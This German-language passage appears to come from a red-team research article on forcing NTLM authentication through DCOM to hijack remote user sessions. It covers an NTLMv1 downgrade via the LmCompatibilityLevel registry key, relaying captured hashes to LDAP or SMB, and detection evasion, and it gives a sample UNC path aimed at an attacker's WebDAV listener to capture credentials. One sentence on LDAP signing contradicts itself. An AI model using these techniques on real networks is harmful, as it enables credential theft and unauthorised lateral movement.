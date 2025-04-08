Nachdem wir nun wissen, dass es möglich ist, ein DCOM-Objekt in ein Session-Hijacking-Tool umzuwandeln, besteht der nächste Schritt darin, die Methoden und Eigenschaften zu identifizieren, die genutzt werden können, um den Hijack durchzuführen. Im Rahmen dieser Forschung habe ich geprüft, ob eine Kompromittierung des Nutzers ohne Ausführung einer Payload erreicht werden kann – ein anderer Ansatz als die meisten öffentlichen DCOM-Techniken zur Lateralbewegung.

Ich habe mich darauf konzentriert, vergleichbare Ergebnisse in einem „dateilosen“ Format zu erzielen, was bedeutet, dass keine Nutzdaten auf das Zielsystem übertragen oder ausgeführt werden müssen. Diese Unterscheidung ist wichtig, da das Übertragen und Ausführen von Nutzdaten auf einem Zielsystem bei Red-Team-Operationen oft als „teure“ Maßnahme angesehen wird. Durch den Wegfall dieses Schritts wird das Risiko der Auslösung gängiger Sicherheitskontrollen erheblich verringert. Daher war es mein Ziel, die Konten entfernter Benutzer durch Erzwingen einer NTLM-Authentifizierung über DCOM zu kompromittieren.

Die erzwungene NTLM-Authentifizierung bietet gegenüber herkömmlichen Lateral-Movement-Techniken mehrere entscheidende Vorteile:

Erfassen Sie NTLMv1/NTLMv2-Hashes und versuchen Sie, diese offline zu knacken.

Leiten Sie NTLMv1- oder WebDAV NTLMv2-Hashes an andere Netzwerkdienste wie LDAP oder SMB weiter, um Aktionen als der betroffene Benutzer auszuführen

Vermeiden Sie es, eine Nutzlast auf das Zielsystem zu übertragen und dort auszuführen, was in der Regel eine genauere Prüfung durch Sicherheitstools nach sich zieht.

Vermeiden Sie jegliche Berührung des LSASS-Prozesses, um die Erkennungsrisiken zu verringern.

Zum Zeitpunkt der Erstellung dieses Artikels sind LDAP-Signierung und Kanalbindung nicht erforderlich und werden auf den meisten Domain-Controllern standardmäßig durchgesetzt. Diese Sicherheitsfunktionen sind nur auf Windows Server 2025 verpflichtend. Das heißt, wenn wir eine NTLMv1- oder WebDAV-Authentifizierung vom Zielsystem erzwingen können, können wir sie an LDAP weiterleiten und als der betroffene Benutzer Aktionen ausführen. Ebenso ist die SMB-Signatur auf Windows-Servern standardmäßig nicht erforderlich, mit Ausnahme von Domänencontrollern.

Ein weiterer wichtiger Aspekt ist, dass NTLMv1-Hashes mit Rainbow-Tabellen trivial geknackt werden können, die seit Dezember 2024 von Nic Losby öffentlich geteilt wurden. Diese Tabellen reduzieren den Zeit- und Arbeitsaufwand für die Wiederherstellung von NTLM-Zugangsdaten aus NTLMv1-Hashes drastisch. Um einen NTLMv1-Hash anstelle eines NTLMv2-Hashes zu erhalten, ändern wir den folgenden Registrierungsschlüssel auf dem Zielsystem:

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

Wenn LmCompatibilityLevel auf einen Wert von 2 oder weniger gesetzt wird, wird das System gezwungen, für die Authentifizierung auf NTLMv1 zurückzugreifen. Diese Änderung ist mit lokalen Administratorrechten möglich und wird allgemein als „NetNTLMv1-Downgrade-Angriff“ bezeichnet.

Alternativ können wir eine WebDAV-Authentifizierung erfassen und an LDAP weiterleiten, da HTTP-basierte Authentifizierungen an diesen Dienst weitergeleitet werden können. Wenn der WebClient-Dienst nicht bereits mit privilegiertem Zugriff ausgeführt wird, können wir ihn per Fernzugriff auf dem Zielsystem aktivieren. Nach der Aktivierung können wir eine WebDAV-NTLM-Authentifizierung für unseren Listener erzwingen, indem wir den NetBIOS-Namen des Rechners im UNC-Pfad angeben. Einige Beispiele:

\\MYHACKERBOX@80\giveme\creds.txt

Für weitere Informationen zu NTLM-Relay-Angriffen und den Protokollen, die an verschiedene Endgeräte weitergeleitet werden können, siehe die folgende Ressourcen hier.